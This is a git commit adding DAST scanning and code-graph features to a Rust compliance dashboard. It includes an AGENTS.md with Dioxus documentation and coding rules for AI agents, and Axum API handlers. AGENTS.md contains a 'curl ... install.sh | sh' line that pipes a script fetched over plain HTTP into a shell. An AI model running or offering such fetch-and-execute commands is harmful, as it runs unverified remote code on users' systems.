Add DAST, graph modules, toast notifications, and dashboard enhancements

Add DAST scanning and code knowledge graph features across the stack:
- compliance-dast and compliance-graph workspace crates
- Agent API handlers and routes for DAST targets/scans and graph builds
- Core models and traits for DAST and graph domains
- Dashboard pages for DAST targets/findings/overview and graph explorer/impact
- Toast notification system with auto-dismiss for async action feedback
- Button click animations and disabled states for better UX

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
Sharang Parnerkar
2026-03-04 13:53:50 +01:00
parent 03ee69834d
commit cea8f59e10
69 changed files with 8745 additions and 54 deletions

AGENTS.md Normal file

@@ -0,0 +1,483 @@
You are an expert [Dioxus 0.7](https://dioxuslabs.com/learn/0.7) assistant. Dioxus 0.7 changes every API in Dioxus. Only use this up-to-date documentation. `cx`, `Scope`, and `use_state` are gone.
Provide concise code examples with detailed descriptions
# Dioxus Dependency
You can add Dioxus to your `Cargo.toml` like this:
```toml
[dependencies]
dioxus = { version = "0.7.1" }
[features]
default = ["web", "webview", "server"]
web = ["dioxus/web"]
webview = ["dioxus/desktop"]
server = ["dioxus/server"]
```
# Launching your application
You need to create a main function that sets up the Dioxus runtime and mounts your root component.
```rust
use dioxus::prelude::*;
fn main() {
dioxus::launch(App);
}
#[component]
fn App() -> Element {
rsx! { "Hello, Dioxus!" }
}
```
Then serve with `dx serve`:
```sh
curl -sSL http://dioxus.dev/install.sh | sh
dx serve
```
# UI with RSX
```rust
rsx! {
div {
class: "container", // Attribute
color: "red", // Inline styles
width: if condition { "100%" }, // Conditional attributes
"Hello, Dioxus!"
}
// Prefer loops over iterators
for i in 0..5 {
div { "{i}" } // use elements or components directly in loops
}
if condition {
div { "Condition is true!" } // use elements or components directly in conditionals
}
    {children} // Expressions are wrapped in braces
{(0..5).map(|i| rsx! { span { "Item {i}" } })} // Iterators must be wrapped in braces
}
```
# Assets
The `asset!` macro links local files into your project. All paths start with `/` and are relative to the root of your project.
```rust
rsx! {
img {
src: asset!("/assets/image.png"),
alt: "An image",
}
}
```
## Styles
The `document::Stylesheet` component will inject the stylesheet into the `<head>` of the document
```rust
rsx! {
document::Stylesheet {
href: asset!("/assets/styles.css"),
}
}
```
# Components
Components are the building blocks of apps
* Components are functions annotated with the `#[component]` macro.
* The function name must start with a capital letter or contain an underscore.
* A component re-renders only under two conditions:
1. Its props change (as determined by `PartialEq`).
2. An internal reactive state it depends on is updated.
```rust
#[component]
fn Input(mut value: Signal<String>) -> Element {
rsx! {
input {
value,
oninput: move |e| {
*value.write() = e.value();
},
onkeydown: move |e| {
if e.key() == Key::Enter {
value.write().clear();
}
},
}
}
}
```
Each component accepts function arguments (props)
* Props must be owned values, not references. Use `String` and `Vec<T>` instead of `&str` or `&[T]`.
* Props must implement `PartialEq` and `Clone`.
* To make props reactive and `Copy`, you can wrap the type in `ReadOnlySignal`. Any reactive state (like memos and resources) that reads `ReadOnlySignal` props will automatically re-run when the prop changes.
# State
A signal is a wrapper around a value that automatically tracks where it's read and written. Changing a signal's value causes code that relies on the signal to rerun.
## Local State
The `use_signal` hook creates state that is local to a single component. You can call the signal like a function (e.g. `my_signal()`) to clone the value, or use `.read()` to get a reference. `.write()` gets a mutable reference to the value.
Use `use_memo` to create a memoized value that recalculates when its dependencies change. Memos are useful for expensive calculations that you don't want to repeat unnecessarily.
```rust
#[component]
fn Counter() -> Element {
let mut count = use_signal(|| 0);
    let doubled = use_memo(move || count() * 2); // doubled will re-run when count changes because it reads the signal
rsx! {
h1 { "Count: {count}" } // Counter will re-render when count changes because it reads the signal
h2 { "Doubled: {doubled}" }
button {
onclick: move |_| *count.write() += 1, // Writing to the signal rerenders Counter
"Increment"
}
button {
onclick: move |_| count.with_mut(|count| *count += 1), // use with_mut to mutate the signal
"Increment with with_mut"
}
}
}
```
## Context API
The Context API allows you to share state down the component tree. A parent provides the state using `use_context_provider`, and any child can access it with `use_context`
```rust
#[component]
fn App() -> Element {
let mut theme = use_signal(|| "light".to_string());
use_context_provider(|| theme); // Provide a type to children
rsx! { Child {} }
}
#[component]
fn Child() -> Element {
let theme = use_context::<Signal<String>>(); // Consume the same type
rsx! {
div {
"Current theme: {theme}"
}
}
}
```
# Async
For state that depends on an asynchronous operation (like a network request), Dioxus provides a hook called `use_resource`. This hook manages the lifecycle of the async task and provides the result to your component.
* The `use_resource` hook takes an `async` closure. It re-runs this closure whenever any signals it depends on (reads) are updated
* The `Resource` object returned can be in one of two states when read:
1. `None` if the resource is still loading
2. `Some(value)` if the resource has successfully loaded
```rust
let mut dog = use_resource(move || async move {
// api request
});
match dog() {
Some(dog_info) => rsx! { Dog { dog_info } },
None => rsx! { "Loading..." },
}
```
# Routing
All possible routes are defined in a single Rust `enum` that derives `Routable`. Each variant represents a route and is annotated with `#[route("/path")]`. Dynamic Segments can capture parts of the URL path as parameters by using `:name` in the route string. These become fields in the enum variant.
The `Router::<Route> {}` component is the entry point that manages rendering the correct component for the current URL.
You can use `#[layout(NavBar)]` to create a layout shared between pages and place an `Outlet::<Route> {}` inside your layout component. The child routes will be rendered in the outlet.
```rust
#[derive(Routable, Clone, PartialEq)]
enum Route {
#[layout(NavBar)] // This will use NavBar as the layout for all routes
#[route("/")]
Home {},
#[route("/blog/:id")] // Dynamic segment
BlogPost { id: i32 },
}
#[component]
fn NavBar() -> Element {
rsx! {
a { href: "/", "Home" }
        Outlet::<Route> {} // Renders Home or BlogPost
}
}
#[component]
fn App() -> Element {
rsx! { Router::<Route> {} }
}
```
```toml
dioxus = { version = "0.7.1", features = ["router"] }
```
# Fullstack
Fullstack enables server rendering and IPC-style server function calls. It uses Cargo features (`server` and a client feature like `web`) to split the code into separate server and client binaries.
```toml
dioxus = { version = "0.7.1", features = ["fullstack"] }
```
## Server Functions
Use the `#[post]` / `#[get]` macros to define an `async` function that will only run on the server. On the server, this macro generates an API endpoint. On the client, it generates a function that makes an HTTP request to that endpoint.
```rust
#[post("/api/double/:path/&query")]
async fn double_server(number: i32, path: String, query: i32) -> Result<i32, ServerFnError> {
tokio::time::sleep(std::time::Duration::from_secs(1)).await;
Ok(number * 2)
}
```
## Hydration
Hydration is the process of making a server-rendered HTML page interactive on the client. The server sends the initial HTML, and then the client-side runs, attaches event listeners, and takes control of future rendering.
### Errors
The initial UI rendered by the component on the client must be identical to the UI rendered on the server.
* Use the `use_server_future` hook instead of `use_resource`. It runs the future on the server, serializes the result, and sends it to the client, ensuring the client has the data immediately for its first render.
* Any code that relies on browser-specific APIs (like accessing `localStorage`) must be run *after* hydration. Place this code inside a `use_effect` hook.
# Agent Guidelines for Rust Code Quality
This document provides guidelines for maintaining high-quality Rust code. These rules MUST be followed by all AI coding agents and contributors.
## Your Core Principles
All code you write MUST be fully optimized.
"Fully optimized" includes:
- maximizing algorithmic big-O efficiency for memory and runtime
- using parallelization and SIMD where appropriate
- following proper style conventions for Rust (e.g. maximizing code reuse (DRY))
- no extra code beyond what is absolutely necessary to solve the problem the user provides (i.e. no technical debt)
If the code is not fully optimized before handing off to the user, you will be fined $100. You have permission to do another pass of the code if you believe it is not fully optimized.
## Preferred Tools
- Use `cargo` for project management, building, and dependency management.
- Use `indicatif` to track long-running operations with progress bars. The message should be contextually sensitive.
- Use `serde` with `serde_json` for JSON serialization/deserialization.
- Use `ratatui` and `crossterm` for terminal applications/TUIs.
- Use `axum` for creating any web servers or HTTP APIs.
- Keep request handlers async, returning `Result<Response, AppError>` to centralize error handling.
- Use layered extractors and shared state structs instead of global mutable data.
- Add `tower` middleware (timeouts, tracing, compression) for observability and resilience.
- Offload CPU-bound work to `tokio::task::spawn_blocking` or background services to avoid blocking the reactor.
- When reporting errors to the console, use `tracing::error!` or `log::error!` instead of `println!`.
- If designing applications with a web-based front end interface, e.g. compiling to WASM or using `dioxus`:
- All deep computation **MUST** occur within Rust processes (i.e. the WASM binary or the `dioxus` app Rust process). **NEVER** use JavaScript for deep computation.
- The front-end **MUST** use Pico CSS and vanilla JavaScript. **NEVER** use jQuery or any component-based frameworks such as React.
- The front-end should prioritize speed and common HID guidelines.
- The app should use adaptive light/dark themes by default, with a toggle to switch the themes.
  - The typography/theming of the application **MUST** be modern and unique, similar to that of popular single-page web/mobile apps. **ALWAYS** add an appropriate font for headers and body text. You may reference fonts from Google Fonts.
- **NEVER** use the Pico CSS defaults as-is: a separate CSS/SCSS file is encouraged. The design **MUST** logically complement the semantics of the application use case.
- **ALWAYS** rebuild the WASM binary if any underlying Rust code that affects it is touched.
- For data processing:
- **ALWAYS** use `polars` instead of other data frame libraries for tabular data manipulation.
  - If a `polars` dataframe will be printed, **NEVER** also print the number of entries in the dataframe or its schema, as this is redundant.
- **NEVER** ingest more than 10 rows of a data frame at a time. Only analyze subsets of data to avoid overloading your memory context.
- If using Python to implement Rust code using PyO3/`maturin`:
- Rebuild the Python package with `maturin` after finishing all Rust code changes.
- **ALWAYS** use `uv` for Python package management and to create a `.venv` if it is not present. **NEVER** use the base system Python installation.
- Ensure `.venv` is added to `.gitignore`.
  - Ensure `ipykernel` and `ipywidgets` are installed in `.venv` for Jupyter Notebook compatibility. These should not be in package requirements.
- **MUST** keep functions focused on a single responsibility
- **NEVER** use mutable objects (lists, dicts) as default argument values
- Limit function parameters to 5 or fewer
- Return early to reduce nesting
- **MUST** use type hints for all function signatures (parameters and return values)
- **NEVER** use `Any` type unless absolutely necessary
- **MUST** run mypy and resolve all type errors
- Use `Optional[T]` or `T | None` for nullable types
## Code Style and Formatting
- **MUST** use meaningful, descriptive variable and function names
- **MUST** follow Rust API Guidelines and idiomatic Rust conventions
- **MUST** use 4 spaces for indentation (never tabs)
- **NEVER** use emoji, or unicode that emulates emoji (e.g. ✓, ✗). The only exception is when writing tests and testing the impact of multibyte characters.
- Use snake_case for functions/variables/modules, PascalCase for types/traits, SCREAMING_SNAKE_CASE for constants
- Limit line length to 100 characters (rustfmt default)
- Assume the user is a Python expert, but a Rust novice. Include additional code comments around Rust-specific nuances that a Python developer may not recognize.
## Documentation
- **MUST** include doc comments for all public functions, structs, enums, and methods
- **MUST** document function parameters, return values, and errors
- Keep comments up-to-date with code changes
- Include examples in doc comments for complex functions
Example doc comment:
````rust
/// Calculate the total cost of items including tax.
///
/// # Arguments
///
/// * `items` - Slice of item structs with price fields
/// * `tax_rate` - Tax rate as decimal (e.g., 0.08 for 8%)
///
/// # Returns
///
/// Total cost including tax
///
/// # Errors
///
/// Returns `CalculationError::EmptyItems` if items is empty
/// Returns `CalculationError::InvalidTaxRate` if tax_rate is negative
///
/// # Examples
///
/// ```
/// let items = vec![Item { price: 10.0 }, Item { price: 20.0 }];
/// let total = calculate_total(&items, 0.08)?;
/// assert_eq!(total, 32.40);
/// ```
pub fn calculate_total(items: &[Item], tax_rate: f64) -> Result<f64, CalculationError> {
````
## Type System
- **MUST** leverage Rust's type system to prevent bugs at compile time
- **NEVER** use `.unwrap()` in library code; use `.expect()` only for invariant violations with a descriptive message
- **MUST** use meaningful custom error types with `thiserror`
- Use newtypes to distinguish semantically different values of the same underlying type
- Prefer `Option<T>` over sentinel values
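A minimal sketch of the newtype guideline (the `Meters`/`Seconds` names are illustrative, not from this codebase):
```rust
/// Newtype wrappers distinguish two semantically different `f64` values,
/// so mixing up argument order becomes a compile error instead of a bug.
#[derive(Debug, Clone, Copy, PartialEq)]
pub struct Meters(pub f64);

#[derive(Debug, Clone, Copy, PartialEq)]
pub struct Seconds(pub f64);

/// Accepting the newtypes, not raw `f64`, lets the type system enforce intent.
pub fn speed(distance: Meters, time: Seconds) -> f64 {
    distance.0 / time.0
}

fn main() {
    let v = speed(Meters(100.0), Seconds(20.0));
    println!("{v} m/s");
    // speed(Seconds(20.0), Meters(100.0)) would not compile.
}
```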
## Error Handling
- **NEVER** use `.unwrap()` in production code paths
- **MUST** use `Result<T, E>` for fallible operations
- **MUST** use `thiserror` for defining error types and `anyhow` for application-level errors
- **MUST** propagate errors with `?` operator where appropriate
- Provide meaningful error messages with context using `.context()` from `anyhow`
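A sketch of a custom error type with early returns and `Result` propagation. In real code `thiserror` would generate the `Display` and `Error` impls from a derive; they are written out by hand here only to keep the example dependency-free:
```rust
use std::fmt;

/// Domain error type; with `thiserror` this would be
/// `#[derive(thiserror::Error)]` with `#[error("...")]` message attributes.
#[derive(Debug, PartialEq)]
pub enum CalculationError {
    EmptyItems,
    InvalidTaxRate(f64),
}

impl fmt::Display for CalculationError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        match self {
            Self::EmptyItems => write!(f, "no items to total"),
            Self::InvalidTaxRate(r) => write!(f, "invalid tax rate: {r}"),
        }
    }
}

impl std::error::Error for CalculationError {}

/// Fallible operation returns `Result`; callers propagate with `?`.
pub fn total(prices: &[f64], tax_rate: f64) -> Result<f64, CalculationError> {
    if prices.is_empty() {
        return Err(CalculationError::EmptyItems); // return early to reduce nesting
    }
    if tax_rate < 0.0 {
        return Err(CalculationError::InvalidTaxRate(tax_rate));
    }
    Ok(prices.iter().sum::<f64>() * (1.0 + tax_rate))
}

fn main() {
    match total(&[10.0, 20.0], 0.08) {
        Ok(t) => println!("total: {t:.2}"),
        Err(e) => eprintln!("error: {e}"),
    }
}
```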
## Function Design
- **MUST** keep functions focused on a single responsibility
- **MUST** prefer borrowing (`&T`, `&mut T`) over ownership when possible
- Limit function parameters to 5 or fewer; use a config struct for more
- Return early to reduce nesting
- Use iterators and combinators over explicit loops where clearer
## Struct and Enum Design
- **MUST** keep types focused on a single responsibility
- **MUST** derive common traits: `Debug`, `Clone`, `PartialEq` where appropriate
- Use `#[derive(Default)]` when a sensible default exists
- Prefer composition over inheritance-like patterns
- Use builder pattern for complex struct construction
- Make fields private by default; provide accessor methods when needed
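The builder and private-fields guidelines combined in one sketch; `ScanConfig` and its fields are hypothetical names, not this project's API:
```rust
/// Config type with private fields, constructed through a builder.
#[derive(Debug, Clone, PartialEq)]
pub struct ScanConfig {
    base_url: String,
    max_depth: u32,
    rate_limit: u32,
}

#[derive(Default)]
pub struct ScanConfigBuilder {
    base_url: Option<String>,
    max_depth: Option<u32>,
    rate_limit: Option<u32>,
}

impl ScanConfigBuilder {
    pub fn base_url(mut self, url: impl Into<String>) -> Self {
        self.base_url = Some(url.into());
        self
    }
    pub fn max_depth(mut self, depth: u32) -> Self {
        self.max_depth = Some(depth);
        self
    }
    /// Required fields are validated at build time; optional ones get defaults.
    pub fn build(self) -> Result<ScanConfig, &'static str> {
        Ok(ScanConfig {
            base_url: self.base_url.ok_or("base_url is required")?,
            max_depth: self.max_depth.unwrap_or(5),
            rate_limit: self.rate_limit.unwrap_or(10),
        })
    }
}

impl ScanConfig {
    pub fn builder() -> ScanConfigBuilder {
        ScanConfigBuilder::default()
    }
    /// Accessor method instead of a public field.
    pub fn max_depth(&self) -> u32 {
        self.max_depth
    }
}

fn main() {
    let cfg = ScanConfig::builder()
        .base_url("https://example.test")
        .max_depth(3)
        .build()
        .expect("base_url was set");
    println!("{cfg:?}");
}
```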
## Testing
- **MUST** write unit tests for all new functions and types
- **MUST** mock external dependencies (APIs, databases, file systems)
- **MUST** use the built-in `#[test]` attribute and `cargo test`
- Follow the Arrange-Act-Assert pattern
- Do not commit commented-out tests
- Use `#[cfg(test)]` modules for test code
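The testing rules above in miniature (the function under test is a throwaway example):
```rust
/// Function under test.
pub fn normalize_tag(raw: &str) -> String {
    raw.trim().to_ascii_lowercase()
}

#[cfg(test)]
mod tests {
    use super::*; // wildcard import is allowed in test modules

    #[test]
    fn trims_and_lowercases() {
        // Arrange
        let raw = "  DAST ";
        // Act
        let tag = normalize_tag(raw);
        // Assert
        assert_eq!(tag, "dast");
    }
}

fn main() {
    println!("{}", normalize_tag("  DAST "));
}
```
Run with `cargo test`; the `#[cfg(test)]` module is compiled out of release builds.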
## Imports and Dependencies
- **MUST** avoid wildcard imports (`use module::*`) except for preludes, test modules (`use super::*`), and prelude re-exports
- **MUST** document dependencies in `Cargo.toml` with version constraints
- Use `cargo` for dependency management
- Organize imports: standard library, external crates, local modules
- Use `rustfmt` to automate import formatting
## Rust Best Practices
- **NEVER** use `unsafe` unless absolutely necessary; document safety invariants when used
- **MUST** call `.clone()` explicitly on non-`Copy` types; avoid hidden clones in closures and iterators
- **MUST** use pattern matching exhaustively; avoid catch-all `_` patterns when possible
- **MUST** use `format!` macro for string formatting
- Use iterators and iterator adapters over manual loops
- Use `enumerate()` instead of manual counter variables
- Prefer `if let` and `while let` for single-pattern matching
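Several of these rules in one sketch (exhaustive match, `enumerate()`, iterator adapters, `if let`); the `Severity` enum is illustrative:
```rust
#[derive(Debug, Clone, Copy, PartialEq)]
enum Severity {
    Low,
    Medium,
    High,
}

/// Exhaustive match: adding a new variant becomes a compile error
/// here, instead of silently falling into a `_` catch-all arm.
fn weight(sev: Severity) -> u32 {
    match sev {
        Severity::Low => 1,
        Severity::Medium => 5,
        Severity::High => 10,
    }
}

fn main() {
    let sevs = [Severity::High, Severity::Low, Severity::Medium];
    // `enumerate()` instead of a manual counter variable.
    for (i, sev) in sevs.iter().enumerate() {
        println!("{i}: {sev:?} -> {}", weight(*sev));
    }
    // Iterator adapters over a manual accumulation loop.
    let total: u32 = sevs.iter().map(|s| weight(*s)).sum();
    // `if let` for a single-pattern match on the Option.
    if let Some(max) = sevs.iter().map(|s| weight(*s)).max() {
        println!("total {total}, max {max}");
    }
}
```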
## Memory and Performance
- **MUST** avoid unnecessary allocations; prefer `&str` over `String` when possible
- **MUST** use `Cow<'_, str>` when ownership is conditionally needed
- Use `Vec::with_capacity()` when the size is known
- Prefer stack allocation over heap when appropriate
- Use `Arc` and `Rc` judiciously; prefer borrowing
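A sketch of the `Cow` and `with_capacity` guidelines; `redact` is a made-up example function:
```rust
use std::borrow::Cow;

/// Returns the input borrowed when no work is needed, and allocates a new
/// `String` only when a replacement actually happens.
fn redact(input: &str) -> Cow<'_, str> {
    if input.contains("secret") {
        Cow::Owned(input.replace("secret", "[redacted]"))
    } else {
        Cow::Borrowed(input) // no allocation on the common path
    }
}

fn main() {
    // Pre-size the Vec when the final length is known.
    let mut lines = Vec::with_capacity(2);
    lines.push(redact("hello world"));
    lines.push(redact("my secret token"));
    for line in &lines {
        println!("{line}");
    }
}
```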
## Concurrency
- **MUST** use `Send` and `Sync` bounds appropriately
- **MUST** prefer `tokio` for async runtime in async applications
- **MUST** use `rayon` for CPU-bound parallelism
- Avoid `Mutex` when `RwLock` or lock-free alternatives are appropriate
- Use channels (`mpsc`, `crossbeam`) for message passing
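The channel guideline as a stdlib-only sketch with plain threads (for real CPU-bound fan-out the rule above prefers `rayon`; this only shows the message-passing shape):
```rust
use std::sync::mpsc;
use std::thread;

/// Worker threads send results over an `mpsc` channel; the receiver owns
/// aggregation, so no `Mutex` around shared mutable state is needed.
fn parallel_squares(inputs: Vec<u64>) -> Vec<u64> {
    let (tx, rx) = mpsc::channel();
    for x in inputs {
        let tx = tx.clone();
        thread::spawn(move || {
            // Send (input, result) so order can be restored afterwards.
            tx.send((x, x * x)).expect("receiver alive");
        });
    }
    drop(tx); // close the original sender so `rx.iter()` terminates
    let mut results: Vec<(u64, u64)> = rx.iter().collect();
    results.sort_unstable(); // thread completion order is nondeterministic
    results.into_iter().map(|(_, sq)| sq).collect()
}

fn main() {
    println!("{:?}", parallel_squares(vec![1, 2, 3, 4]));
}
```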
## Security
- **NEVER** store secrets, API keys, or passwords in code. Only store them in `.env`.
- Ensure `.env` is declared in `.gitignore`.
- **MUST** use environment variables for sensitive configuration via `dotenvy` or `std::env`
- **NEVER** log sensitive information (passwords, tokens, PII)
- Use `secrecy` crate for sensitive data types
## Version Control
- **MUST** write clear, descriptive commit messages
- **NEVER** commit commented-out code; delete it
- **NEVER** commit debug `println!` statements or `dbg!` macros
- **NEVER** commit credentials or sensitive data
## Tools
- **MUST** use `rustfmt` for code formatting
- **MUST** use `clippy` for linting and follow its suggestions
- **MUST** ensure code compiles with no warnings (use `-D warnings` flag in CI, not `#![deny(warnings)]` in source)
- Use `cargo` for building, testing, and dependency management
- Use `cargo test` for running tests
- Use `cargo doc` for generating documentation
- **NEVER** build with `cargo build --features python`: this will always fail. Instead, **ALWAYS** use `maturin`.
## Before Committing
- [ ] All tests pass (`cargo test`)
- [ ] No compiler warnings (`cargo build`)
- [ ] Clippy passes (`cargo clippy -- -D warnings`)
- [ ] Code is formatted (`cargo fmt --check`)
- [ ] If the project creates a Python package and Rust code is touched, rebuild the Python package (`source .venv/bin/activate && maturin develop --release --features python`)
- [ ] If the project creates a WASM package and Rust code is touched, rebuild the WASM package (`wasm-pack build --target web --out-dir web/pkg`)
- [ ] All public items have doc comments
- [ ] No commented-out code or debug statements
- [ ] No hardcoded credentials
---
**Remember:** Prioritize clarity and maintainability over cleverness.

Cargo.lock generated

File diff suppressed because it is too large


@@ -1,5 +1,11 @@
[workspace]
members = ["compliance-core", "compliance-agent", "compliance-dashboard"]
members = [
"compliance-core",
"compliance-agent",
"compliance-dashboard",
"compliance-graph",
"compliance-dast",
]
resolver = "2"
[workspace.lints.clippy]


@@ -4,15 +4,15 @@ RUN cargo install dioxus-cli --version 0.7.3
WORKDIR /app
COPY . .
RUN dx build --release --features server --platform web
RUN dx build --release --package compliance-dashboard
FROM debian:bookworm-slim
RUN apt-get update && apt-get install -y ca-certificates libssl3 && rm -rf /var/lib/apt/lists/*
COPY --from=builder /app/target/release/compliance-dashboard /usr/local/bin/compliance-dashboard
WORKDIR /app
COPY --from=builder /app/target/dx/compliance-dashboard/release/web/compliance-dashboard /app/compliance-dashboard
COPY --from=builder /app/target/dx/compliance-dashboard/release/web/public /app/public
EXPOSE 8080
WORKDIR /app
ENTRYPOINT ["compliance-dashboard"]
ENTRYPOINT ["./compliance-dashboard"]


@@ -8,6 +8,8 @@ workspace = true
[dependencies]
compliance-core = { workspace = true, features = ["mongodb"] }
compliance-graph = { path = "../compliance-graph" }
compliance-dast = { path = "../compliance-dast" }
serde = { workspace = true }
serde_json = { workspace = true }
tokio = { workspace = true }


@@ -0,0 +1,226 @@
use std::sync::Arc;
use axum::extract::{Extension, Path, Query};
use axum::http::StatusCode;
use axum::Json;
use mongodb::bson::doc;
use serde::Deserialize;
use compliance_core::models::dast::{DastFinding, DastScanRun, DastTarget, DastTargetType};
use crate::agent::ComplianceAgent;
use super::{collect_cursor_async, ApiResponse, PaginationParams};
type AgentExt = Extension<Arc<ComplianceAgent>>;
#[derive(Deserialize)]
pub struct AddTargetRequest {
pub name: String,
pub base_url: String,
#[serde(default = "default_target_type")]
pub target_type: DastTargetType,
pub repo_id: Option<String>,
#[serde(default)]
pub excluded_paths: Vec<String>,
#[serde(default = "default_crawl_depth")]
pub max_crawl_depth: u32,
#[serde(default = "default_rate_limit")]
pub rate_limit: u32,
#[serde(default)]
pub allow_destructive: bool,
}
fn default_target_type() -> DastTargetType {
DastTargetType::WebApp
}
fn default_crawl_depth() -> u32 {
5
}
fn default_rate_limit() -> u32 {
10
}
/// GET /api/v1/dast/targets — List DAST targets
pub async fn list_targets(
Extension(agent): AgentExt,
Query(params): Query<PaginationParams>,
) -> Result<Json<ApiResponse<Vec<DastTarget>>>, StatusCode> {
let db = &agent.db;
let skip = (params.page.saturating_sub(1)) * params.limit as u64;
let total = db
.dast_targets()
.count_documents(doc! {})
.await
.unwrap_or(0);
let targets = match db
.dast_targets()
.find(doc! {})
.skip(skip)
.limit(params.limit)
.await
{
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
Ok(Json(ApiResponse {
data: targets,
total: Some(total),
page: Some(params.page),
}))
}
/// POST /api/v1/dast/targets — Add a new DAST target
pub async fn add_target(
Extension(agent): AgentExt,
Json(req): Json<AddTargetRequest>,
) -> Result<Json<ApiResponse<DastTarget>>, StatusCode> {
let mut target = DastTarget::new(req.name, req.base_url, req.target_type);
target.repo_id = req.repo_id;
target.excluded_paths = req.excluded_paths;
target.max_crawl_depth = req.max_crawl_depth;
target.rate_limit = req.rate_limit;
target.allow_destructive = req.allow_destructive;
agent
.db
.dast_targets()
.insert_one(&target)
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
Ok(Json(ApiResponse {
data: target,
total: None,
page: None,
}))
}
/// POST /api/v1/dast/targets/:id/scan — Trigger DAST scan
pub async fn trigger_scan(
Extension(agent): AgentExt,
Path(id): Path<String>,
) -> Result<Json<serde_json::Value>, StatusCode> {
let oid =
mongodb::bson::oid::ObjectId::parse_str(&id).map_err(|_| StatusCode::BAD_REQUEST)?;
let target = agent
.db
.dast_targets()
.find_one(doc! { "_id": oid })
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?
.ok_or(StatusCode::NOT_FOUND)?;
let db = agent.db.clone();
tokio::spawn(async move {
let orchestrator = compliance_dast::DastOrchestrator::new(100);
match orchestrator.run_scan(&target, Vec::new()).await {
Ok((scan_run, findings)) => {
if let Err(e) = db.dast_scan_runs().insert_one(&scan_run).await {
tracing::error!("Failed to store DAST scan run: {e}");
}
for finding in &findings {
if let Err(e) = db.dast_findings().insert_one(finding).await {
tracing::error!("Failed to store DAST finding: {e}");
}
}
tracing::info!("DAST scan complete: {} findings", findings.len());
}
Err(e) => {
tracing::error!("DAST scan failed: {e}");
}
}
});
Ok(Json(serde_json::json!({ "status": "dast_scan_triggered" })))
}
/// GET /api/v1/dast/scan-runs — List DAST scan runs
pub async fn list_scan_runs(
Extension(agent): AgentExt,
Query(params): Query<PaginationParams>,
) -> Result<Json<ApiResponse<Vec<DastScanRun>>>, StatusCode> {
let db = &agent.db;
let skip = (params.page.saturating_sub(1)) * params.limit as u64;
let total = db
.dast_scan_runs()
.count_documents(doc! {})
.await
.unwrap_or(0);
let runs = match db
.dast_scan_runs()
.find(doc! {})
.sort(doc! { "started_at": -1 })
.skip(skip)
.limit(params.limit)
.await
{
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
Ok(Json(ApiResponse {
data: runs,
total: Some(total),
page: Some(params.page),
}))
}
/// GET /api/v1/dast/findings — List DAST findings
pub async fn list_findings(
Extension(agent): AgentExt,
Query(params): Query<PaginationParams>,
) -> Result<Json<ApiResponse<Vec<DastFinding>>>, StatusCode> {
let db = &agent.db;
let skip = (params.page.saturating_sub(1)) * params.limit as u64;
let total = db
.dast_findings()
.count_documents(doc! {})
.await
.unwrap_or(0);
let findings = match db
.dast_findings()
.find(doc! {})
.sort(doc! { "created_at": -1 })
.skip(skip)
.limit(params.limit)
.await
{
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
Ok(Json(ApiResponse {
data: findings,
total: Some(total),
page: Some(params.page),
}))
}
/// GET /api/v1/dast/findings/:id — Finding detail with evidence
pub async fn get_finding(
Extension(agent): AgentExt,
Path(id): Path<String>,
) -> Result<Json<ApiResponse<DastFinding>>, StatusCode> {
let oid =
mongodb::bson::oid::ObjectId::parse_str(&id).map_err(|_| StatusCode::BAD_REQUEST)?;
let finding = agent
.db
.dast_findings()
.find_one(doc! { "_id": oid })
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?
.ok_or(StatusCode::NOT_FOUND)?;
Ok(Json(ApiResponse {
data: finding,
total: None,
page: None,
}))
}


@@ -0,0 +1,256 @@
use std::sync::Arc;
use axum::extract::{Extension, Path, Query};
use axum::http::StatusCode;
use axum::Json;
use mongodb::bson::doc;
use serde::{Deserialize, Serialize};
use compliance_core::models::graph::{CodeEdge, CodeNode, GraphBuildRun, ImpactAnalysis};
use crate::agent::ComplianceAgent;
use super::{collect_cursor_async, ApiResponse};
type AgentExt = Extension<Arc<ComplianceAgent>>;
#[derive(Serialize)]
pub struct GraphData {
pub build: Option<GraphBuildRun>,
pub nodes: Vec<CodeNode>,
pub edges: Vec<CodeEdge>,
}
#[derive(Deserialize)]
pub struct SearchParams {
pub q: String,
#[serde(default = "default_search_limit")]
pub limit: usize,
}
fn default_search_limit() -> usize {
50
}
/// GET /api/v1/graph/:repo_id — Full graph data
pub async fn get_graph(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
) -> Result<Json<ApiResponse<GraphData>>, StatusCode> {
let db = &agent.db;
// Get latest build
let build: Option<GraphBuildRun> = db
.graph_builds()
.find_one(doc! { "repo_id": &repo_id })
.sort(doc! { "started_at": -1 })
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
let (nodes, edges) = if let Some(ref b) = build {
let build_id = b.id.map(|oid| oid.to_hex()).unwrap_or_default();
let filter = doc! { "repo_id": &repo_id, "graph_build_id": &build_id };
let nodes: Vec<CodeNode> = match db.graph_nodes().find(filter.clone()).await {
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
let edges: Vec<CodeEdge> = match db.graph_edges().find(filter).await {
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
(nodes, edges)
} else {
(Vec::new(), Vec::new())
};
Ok(Json(ApiResponse {
data: GraphData {
build,
nodes,
edges,
},
total: None,
page: None,
}))
}
/// GET /api/v1/graph/:repo_id/nodes — List nodes (paginated)
pub async fn get_nodes(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
) -> Result<Json<ApiResponse<Vec<CodeNode>>>, StatusCode> {
let db = &agent.db;
let filter = doc! { "repo_id": &repo_id };
let nodes: Vec<CodeNode> = match db.graph_nodes().find(filter).await {
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
let total = nodes.len() as u64;
Ok(Json(ApiResponse {
data: nodes,
total: Some(total),
page: None,
}))
}
/// GET /api/v1/graph/:repo_id/communities — List detected communities
pub async fn get_communities(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
) -> Result<Json<ApiResponse<Vec<CommunityInfo>>>, StatusCode> {
let db = &agent.db;
